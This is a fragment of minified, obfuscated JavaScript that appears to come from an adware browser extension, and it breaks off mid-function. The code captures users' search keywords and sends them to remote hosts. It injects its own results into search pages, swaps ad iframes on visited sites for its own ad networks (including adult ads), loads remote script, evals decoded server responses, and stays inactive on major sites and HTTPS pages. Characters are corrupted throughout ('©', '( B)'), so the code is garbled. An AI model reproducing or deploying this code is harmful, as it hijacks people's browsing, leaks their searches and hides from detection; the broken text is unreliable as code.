a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts[b].selector),\"undefined\"!==typeof a.element){a.insert=a.inserts[b].at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a); (function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom= function(a, B){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom);if(!c.match(/\\[##eid##\\]/))return a; c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse©;return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node=b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\", function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a;if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if©for(var d=0;d<c.length;d++)b.events.add(\"click\",function(){try{var b= a(this)}catch©{}b&&b.parentElement.removeChild( B)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick(); b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c, function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100, \"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens(): (0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael= B);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=8347115683178558813&eid=83&pid=777&prid=316\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\"); e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\", b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}}); ;if(Math.ceil(Math.random()*20)==1){(function(){var a = \"microsoft msn youtube.com ninemsn yahoo maktoob rivals amazon jeuxvideo xbox flickr outlook microsoftstore alltheweb intonow overture tumblr live facebook embedr altavista ashleyfurniturehomestore reddit tripadvisor rightmedia craigslist sprint mozilla att omg.com apple americanexpress\".split(\" \");for(var i=0;i<a.length;i++) if(window.self.location.hostname.indexOf(a[i])>-1){return};try{if(typeof(localStorage)!='undefined' && (window.self.location.hostname.indexOf('adnxs.com')>-1 || window.self.location.hostname.indexOf('doubleclick')>-1 || window.self.location.hostname.indexOf('cloudfront')>-1)){localStorage.setItem(\"xhxg4sk42hsba\",\"9\")}}catch(e){};var _wlst={lsKey:\"xhxg4sk42hsba\",get:function(b,a){if(window.self.location.protocol==\"https:\" || 3<b)return a(!1);var d=this.fetch();if(d)return a(parseInt(d));if(1== B){crc=this.hcrc32(window.self.location.hostname.replace(\"www.\",\"\"));try{var c=document.createElement(\"script\");c.type=\"text/javascript\";try{c.async=\"async\"}catch(e){}c.src=\"http://v.zilionfast.in/\"+crc+\"/?t=vrt\";(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild©}catch(f){}}setTimeout(function(){_wlst.get(++b,a)},180)},fetch:function(){try{if(\"undefined\"!=localStorage)try{return localStorage.getItem(this.lsKey)}catch( B){return 0}else _wlst.getCkie()}catch(a){_wlst.getCkie()}},getCkie:function(){if(0<document.cookie.length&&(c_start=document.cookie.indexOf(this.lsKey+\"=\"),-1!=c_start))return c_start=c_start+this.lsKey.length+1,c_end=document.cookie.indexOf(\";\",c_start),-1==c_end&&(c_end=document.cookie.length),unescape(document.cookie.substring(c_start,c_end))},hcrc32:function(b,a){a||(a=0);var d=0;a^=-1;for(var c=0,e=b.length;c<e;c++)d=(a^b.charCodeAt©)&255,d=\"0x\"+\"00000000 77073096 EE0E612C 990951BA 076DC419 706AF48F E963A535 9E6495A3 0EDB8832 79DCB8A4 E0D5E91E 97D2D988 09B64C2B 7EB17CBD E7B82D07 90BF1D91 1DB71064 6AB020F2 F3B97148 84BE41DE 1ADAD47D 6DDDE4EB F4D4B551 83D385C7 136C9856 646BA8C0 FD62F97A 8A65C9EC 14015C4F 63066CD9 FA0F3D63 8D080DF5 3B6E20C8 4C69105E D56041E4 A2677172 3C03E4D1 4B04D447 D20D85FD A50AB56B 35B5A8FA 42B2986C DBBBC9D6 ACBCF940 32D86CE3 45DF5C75 DCD60DCF ABD13D59 26D930AC 51DE003A C8D75180 BFD06116 21B4F4B5 56B3C423 CFBA9599 B8BDA50F 2802B89E 5F058808 C60CD9B2 B10BE924 2F6F7C87 58684C11 C1611DAB B6662D3D 76DC4190 01DB7106 98D220BC EFD5102A 71B18589 06B6B51F 9FBFE4A5 E8B8D433 7807C9A2 0F00F934 9609A88E E10E9818 7F6A0DBB 086D3D2D 91646C97 E6635C01 6B6B51F4 1C6C6162 856530D8 F262004E 6C0695ED 1B01A57B 8208F4C1 F50FC457 65B0D9C6 12B7E950 8BBEB8EA FCB9887C 62DD1DDF 15DA2D49 8CD37CF3 FBD44C65 4DB26158 3AB551CE A3BC0074 D4BB30E2 4ADFA541 3DD895D7 A4D1C46D D3D6F4FB 4369E96A 346ED9FC AD678846 DA60B8D0 44042D73 33031DE5 AA0A4C5F DD0D7CC9 5005713C 270241AA BE0B1010 C90C2086 5768B525 206F85B3 B966D409 CE61E49F 5EDEF90E 29D9C998 B0D09822 C7D7A8B4 59B33D17 2EB40D81 B7BD5C3B C0BA6CAD EDB88320 9ABFB3B6 03B6E20C 74B1D29A EAD54739 9DD277AF 04DB2615 73DC1683 E3630B12 94643B84 0D6D6A3E 7A6A5AA8 E40ECF0B 9309FF9D 0A00AE27 7D079EB1 F00F9344 8708A3D2 1E01F268 6906C2FE F762575D 806567CB 196C3671 6E6B06E7 FED41B76 89D32BE0 10DA7A5A 67DD4ACC F9B9DF6F 8EBEEFF9 17B7BE43 60B08ED5 D6D6A3E8 A1D1937E 38D8C2C4 4FDFF252 D1BB67F1 A6BC5767 3FB506DD 48B2364B D80D2BDA AF0A1B4C 36034AF6 41047A60 DF60EFC3 A867DF55 316E8EEF 4669BE79 CB61B38C BC66831A 256FD2A0 5268E236 CC0C7795 BB0B4703 220216B9 5505262F C5BA3BBE B2BD0B28 2BB45A92 5CB36A04 C2D7FFA7 B5D0CF31 2CD99E8B 5BDEAE1D 9B64C2B0 EC63F226 756AA39C 026D930A 9C0906A9 EB0E363F 72076785 05005713 95BF4A82 E2B87A14 7BB12BAE 0CB61B38 92D28E9B E5D5BE0D 7CDCEFB7 0BDBDF21 86D3D2D4 F1D4E242 68DDB3F8 1FDA836E 81BE16CD F6B9265B 6FB077E1 18B74777 88085AE6 FF0F6A70 66063BCA 11010B5C 8F659EFF F862AE69 616BFFD3 166CCF45 A00AE278 D70DD2EE 4E048354 3903B3C2 A7672661 D06016F7 4969474D 3E6E77DB AED16A4A D9D65ADC 40DF0B66 37D83BF0 A9BCAE53 DEBB9EC5 47B2CF7F 30B5FFE9 BDBDF21C CABAC28A 53B39330 24B4A3A6 BAD03605 CDD70693 54DE5729 23D967BF B3667A2E C4614AB8 5D681B02 2A6F2B94 B40BBE37 C30C8EA1 5A05DF1B 2D02EF8D\".substr(9*d,8),a=a>>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['ybrant_apn3785',3669],['dsnr_dasa2',166],['dsnr_nntbr2',166],['cpx_cybersoft3_new',4999],['matomy_adj48_new',1000]],[['matomy_strm53',5000],['mari_strm_D',5000]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function( B){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('XZl0Fxw8=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"ads.incmd01.com\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"servedby.adsplats.com\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=287609')>-1|| _zyad.location.indexOf('=511181')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i<b.length;i++)try{if(b[i]&&b[i].getAttribute(\"name\")){var a=b[i].getAttribute(\"name\").toLowerCase();if(\"description\"==a||\"keywords\"==a)_zyad.title=_zyad.title+\" \"+b[i].getAttribute(\"content\")}}catch(d){}}catch©{}b=\"porn sex xxx tits adult lesbian squirt creampie bondage ExSuna mature fisting bleep gangbang orgy gay nude tits tranny blowjob handjob masturbat busty slut joder horny mamada polla cock pussy threesome teens milf bdsm hentai motherless erotic cams petite\".split(\" \");for(i in b)if(-1<_zyad.location.indexOf(b[i])||-1<_zyad.title.indexOf(b[i]))return!0;return!1},epoch:function(){try{var b=new Date;try{return(b.getTime()-b.getMilliseconds())/1E3}catch(a){return parseInt(b.getTime()/1E3)}}catch(d){return 0}},between:function(b,a){return b>=a-7&&b<=a+7},detectRsize:function( B){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function( B){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i<d.length;i++){if(!b)try{if(d[i].hasAttribute(\"s9954933816504950379\"))continue}catch©{try{if(d[i].getAttribute(\"s9954933816504950379\"))continue}catch(e){}};try{if(d[i].src.indexOf('=287609')>-1||d[i].src.indexOf('=511181')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s9954933816504950379\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a, B){_zyad.setNetwork(a[b].ifr,a[b].size);b++;a&&a[b]&&\"function\"==typeof a[b].func&&setTimeout(function(){a[b].func(a, B)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&& B){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000<d&&(c=Math.floor((10000-d)/g.length+0.9));for(i=0;i<g.length;i++)if(d=g[i],f+=_zyad.networks_conf[i][1]+c,f>=e){h[d]( B);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'XZl0Fxw8=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('<html><head>\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script></head><body>&nbsp;\\x3c/body>\\x3c/html>');}catch(e){var h = '<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body><iframe name=\"a7h3h73d3\" src=\"about:blank\" style=\"width:100%;height:100%;border:0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"100%\" height=\"100%\"></iframe>\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script></body></html>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style>\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script></head><body>&nbsp;</body></html>');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body>'+url+'</body></html>');break;}try{ifr.setAttribute(\"s9954933816504950379\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{ybrant_apn3785:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size==\"120x60\")return;var rfr=window.self==window.top?encodeURIComponent(window.self.location.href):'';var arr={\"728x90\":\"2\",\"300x250\":\"1\",\"468x60\":\"3\",\"120x600\":\"5\",\"160x600\":\"4\"}[size];var surl='http://ads.incmd03.com/creative/2-002136823-00001i;size='+arr+';tag_id=3785;ref='+rfr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1013,size]);}}catch(e){return !1;}},dsnr_dasa2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3024342&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1596,size]);}}catch(e){return !1;}},dsnr_nntbr2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3024616&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1605,size]);}}catch(e){return !1;}},cpx_cybersoft3_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsplats.com/tt?id=3294776&size=+size+&referrer=${REFERER_URL}' (atp?atp:1), [1721,size]);}}catch(e){return !1;}},matomy_adj48_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3223120&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1722,size]);}}catch(e){return !1;}},matomy_strm53:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3223135&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1720,size]);}}catch(e){return !1;}},mari_strm_D:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"3168698\",\"300x250\":\"3168699\",\"160x600\":\"3168700\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1708,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-iframe-display.php?type=+size+&login=hulkshare_RS2&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random();if(!document.getElementById(\"sad32ecs3fdsa\")&&1==Math.ceil(4*Math.random()))try{setTimeout(function(){var b=document.getElementsByTagName(\"body\")[0],a=document.createElement(\"div\");a.setAttribute(\"style\",\"width:728px;height:90px;margin:0 auto\");a.setAttribute(\"id\",\"sad32ecs3fdsa\");a.innerHTML='<iframe src=\"//ads.ventivmedia.com/www/delivery/afr.php?zoneid=31&cb='+Math.random()+'\" style=\"width:728px;height:90px\" frameborder=\"0\" scrolling=\"no\"></iframe>';b.insertBefore(a,b.firstChild)},1)}catch(e){};;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();})()}else{(function(){var stngs = {attr_name:'s8347115683178558813',szy_domain:[\"complletegood.in\",\"superstoragemy.org\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12],[600,400,13]],checkif:function(ifr){return (ifr.getAttribute('s8347115683178558813') || ifr.src.indexOf('=287609')>-1||ifr.src.indexOf('=511181')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};window.adzy653rk={nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"777\",eid:\"83\",hid:\"8347115683178558813\",lt:\"11.05\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"XZl0Fxw8\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);return a&&a[0]}return null}(),getKeywords:function(){var a=adzy653rk.imp.title,c=document.getElementsByTagName(\"meta\");if©for(var b=0,d=c.length;b<d;b++)\"keywords\"!=c[b].name.toLowerCase()&&\"description\"!=c[b].name.toLowerCase()||(a+=\" \"+c[b].content.replace(/,/g,\" \"));if(b=document.getElementsByTagName(\"a\")){c={};for(d=0;d<b.length;d++)try{var e=b[d].innerText;\"undefined\"==typeof e&&(e=b[d].textContent);for(var f=e.toLowerCase().split(/[\\s,-]/g),h=0;h<f.length;h++)4>f[h].length||(c[f[h]]?c[f[h]]++:\nc[f[h]]=1)}catch(k){}var e=[],g;for(g in c)e.push([g,c[g]]);e.sort(function(a, B){return b[1]-a[1]});e=e.slice(0,25);for(g=0;g<e.length;g++)a+=\" \"+e[g][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)},init:function(){var a=document.getElementsByTagName(\"iframe\");if(a.length){for(var c=[],b=0;b<a.length;b++)stngs.checkif(a[b])||(a[b].setAttribute(adzy653rk.imp.rattr,\"true\"),a[b].setAttribute(\"replaced\",\"true\"),c.push(a[b]));if(c.length){var d=function(a){if(a>=c.length){var b=adzy653rk.imp;adzy653rk.jbs.at.length?\nadzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+b.pid+\"&subid1=\"+b.hid+\"&subid2=\"+b.eid+\"&lt=\"+b.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords())+(adzy653rk.topHost?\"&tdh=\"+encodeURIComponent(adzy653rk.topHost):\"\"),\"seta\"):adzy653rk.destruct()}else{if(b=adzy653rk.getAt(c[a]))adzy653rk.jbs.ifr.push(c[a]),adzy653rk.jbs.at.push( B);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},\ndfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300<a))){var c=function( B){b>=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},1200):(adzy653rk.src[b]&&adzy653rk.ifr[b]&&adzy653rk.ifr[b].src!=adzy653rk.src[b][0]&&(adzy653rk.ifr[b].nextSibling.innerHTML&&adzy653rk.ifr[b].nextSibling.innerHTML.match(/<span[^>]?>Ads( not)? by/i)?(new Image).src=\"http://zig.installerdatauk.info/?aid=2&bid=1&hid=8347115683178558813&eid=83&pid=777&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr[b].src):\n((new Image).src=\"http://zig.installerdatauk.info/?aid=1&bid=1&hid=8347115683178558813&eid=83&pid=777&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr[b].src),adzy653rk.ifrset(adzy653rk.ifr[b],adzy653rk.src[b][1],1))),setTimeout(function(){c(++ B)},1))};c(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.init,1200)},getAt:function(a){a=[parseInt(\"number\"==\ntypeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var c=adzy653rk.imp.sizes,b=0;b<c.length;b++)if(a[0]>=c[b][0]-5&&a[0]<=c[b][0]+5&&a[1]>=c[b][1]-5&&a[1]<=c[b][1]+5)return c[b][2];return!1},getAds:function(a,c){if(-1<navigator.userAgent.indexOf(\"MSIE\")){var b=document.createElement(\"script\");b.type=\"text/javascript\";b.src=a+\"&cb=adzy653rk.\"+c;b.onreadystatechange=\nb.onload=function(){try{b.parentNode.removeChild( B)}catch(a){}};try{window.adzy653rk=adzy653rk,(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild( B)}catch(d){}}else{var e=new XMLHttpRequest;e.open(\"GET\",a,!0);e.onreadystatechange=function(){if(4==e.readyState)adzy653rk[c](e.response)};e.send(null)}},seta:function(a){var c=null;try{var b=adzy653rk.l.decode(a);\"undefined\"!=typeof JSON&&JSON.parse?c=JSON.parse( B):eval(\"ifrl = \"+ B)}catch(d){}if(c&&c.length)for(a=\n0;a<c.length;a++)c[a]&&adzy653rk.jbs.ifr[a]&&adzy653rk.ifrset(adzy653rk.jbs.ifr[a],c[a]);adzy653rk.destruct()},ifrset:function(a,c, B){b||(adzy653rk.ifr.push(a),c[0]=c[0].replace(/\\[##([^#]+)##\\]/g,function(a, B){return adzy653rk.imp[toekn]?adzy653rk.imp[toekn]:\"\"}));var d=[\"<html><head><style>html,body{width:100%;height:100%;margin:0}</style></head><body>\",\"</body></html>\"];switch(c[1]){case 1:a.src=c[0]+(-1<c[0].indexOf(\"?\")?\"&\"+adzy653rk.imp.jpshort+\"=\"+c[2]+\"_18x18_0\":\"\");break;case 2:a.src=\"about:blank\";\ntry{a.contentWindow.document.write(d[0]+'<iframe src=\"'+c[0]+'\" style=\"width:100%;height:100%;border:0;\" scrolling=\"no\" frameborder=\"0\"></iframe>'+d[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+c[0]+d[1])}catch(f){}}b||adzy653rk.src.push([a.src,c])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var c=\"\",b=0;b<a.length;){var 